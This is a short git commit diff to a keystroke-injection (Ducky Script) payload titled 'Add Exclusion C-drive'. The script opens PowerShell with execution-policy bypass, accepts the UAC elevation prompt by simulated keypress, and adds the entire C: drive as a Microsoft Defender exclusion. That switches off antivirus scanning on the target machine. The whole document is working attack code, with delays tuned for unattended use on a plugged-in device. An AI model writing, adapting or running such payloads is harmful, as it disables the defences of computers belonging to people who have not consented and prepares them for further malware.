Update Add Exclusion C-drive.txt

This commit is contained in:
egieb
2024-06-25 11:38:41 +00:00
committed by GitHub
parent ca05fa1eb7
commit d225ffa8db

View File

@@ -9,15 +9,7 @@ DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
STRING powershell -Exec Bypass -C Add-MpPreference -ExclusionPath C:\
CTRL-SHIFT ENTER
DELAY 1500
DELAY 2500
ALT y
DELAY 5000
REM add the exclusion path.
STRING Add-MpPreference -ExclusionPath C:\
ENTER
DELAY 250
STRING exit
ENTER